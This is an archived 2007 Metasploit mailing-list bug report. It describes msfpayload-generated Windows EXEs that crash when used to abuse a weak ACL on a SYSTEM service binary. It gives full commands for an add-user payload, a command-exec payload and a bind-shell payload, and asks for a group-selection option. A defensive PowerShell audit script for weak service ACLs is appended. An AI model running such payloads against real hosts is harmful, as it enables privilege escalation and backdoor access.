Metasploit mailing list archives
Bugs in msfpayload
From: nicob at nicob.net (Nicob)
Date: Wed, 05 Sep 2007 07:58:14 +0200
Hello !

[=] Bug report :

I recently tried to use msfpayload to exploit some weak ACL on the EXE used by a SYSTEM service (something like [1]). The following tests were done on two distinct Windows XP SP2 French, as an unprivileged user and as an admin (msfpayload from trunk 5080, running on Linux) :

1) msfpayload windows/adduser USER=toto PASS=titi X > adduser_toto_titi.exe
   When executed : Access violation when reading [C2A353BE]

2) msfpayload windows/exec CMD="cmd /c dir c:\ > c:\out.txt" X > exec_dir_c.exe
   When executed : Access violation when reading [C2A353BE]

3) msfpayload windows/shell/bind_tcp LPORT=31337 X > bind_tcp_31337.exe
   When executed, the port is bound but the app crashes at the first command connection :

   C:\> nc -vn 127.0.0.1 31337
   (UNKNOWN) [127.0.0.1] 31337 (?) open
   dir
   [ crash : Access violation when writing to [00000004] ]
   C:\>

But using the "C" option of msfpayload and inserting it in a small skeleton (like [2]) is working.

[=] Questions :

1) Is this bug known, am I missing something ?
2) Is it possible to add to the windows/adduser payload an option allowing to select a given group to which to add the user ? Something like the patch posted by Jerome in May [3].
3) How to use a skeleton like [2] with a two-stage payload like "msfpayload windows/shell/bind_tcp C" ?

[=] Links :

1: http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-cisco-vpn-client-cvpndexe/
2: http://seclists.org/fulldisclosure/2005/Dec/1286.html
3: http://www.metasploit.com/archive/framework/msg02188.html

Regards,
Nicob
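The precondition the post relies on is a SYSTEM service whose executable carries a weak ACL. The following defender-side audit, added here as an example and not part of the original post or of Metasploit, lists such services; it assumes PowerShell 3 or later on Windows (Get-CimInstance) and that the principal names in $broadPrincipals are the broad groups of interest on the host being checked.

```powershell
# Added example (not from the post or Metasploit): list services whose
# executable grants broad groups rights to replace it, i.e. the weak-ACL
# precondition the post exploits. Read-only; run in an elevated PowerShell.

# Principals treated as "anyone"; assumption: extend for local naming variants.
$broadPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that let a caller alter the binary or its permissions.
$dangerousRights = [System.Security.AccessControl.FileSystemRights]::Write -bor
                   [System.Security.AccessControl.FileSystemRights]::Delete -bor
                   [System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
                   [System.Security.AccessControl.FileSystemRights]::TakeOwnership

function Get-ServiceBinaryPath([string]$PathName) {
    # Quoted form: "C:\Program Files\V\svc.exe" -x ; unquoted: C:\dir\svc.exe -k x
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^\s*(.+?\.exe)') { return $Matches[1] }
    return $null
}

function Test-WeakBinaryAcl([string]$Path) {
    # Returns the offending Allow ACEs (none when the file is safe or missing).
    if (-not (Test-Path -LiteralPath $Path)) { return @() }
    (Get-Acl -LiteralPath $Path).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $broadPrincipals -contains $_.IdentityReference.Value -and
        (($_.FileSystemRights -band $dangerousRights) -ne 0)
    }
}

Get-CimInstance -ClassName Win32_Service | ForEach-Object {
    $svc = $_
    $exe = Get-ServiceBinaryPath $svc.PathName
    if (-not $exe) { return }
    foreach ($ace in (Test-WeakBinaryAcl $exe)) {
        [pscustomobject]@{
            Service   = $svc.Name
            RunsAs    = $svc.StartName      # LocalSystem for SYSTEM services
            Binary    = $exe
            Principal = $ace.IdentityReference.Value
            Rights    = $ace.FileSystemRights
        }
    }
} | Format-Table -AutoSize
```

Any row whose RunsAs is LocalSystem is the case the post describes; the fix is to restrict the ACL on the binary (and on its parent directory, which this script does not check) to administrators and SYSTEM.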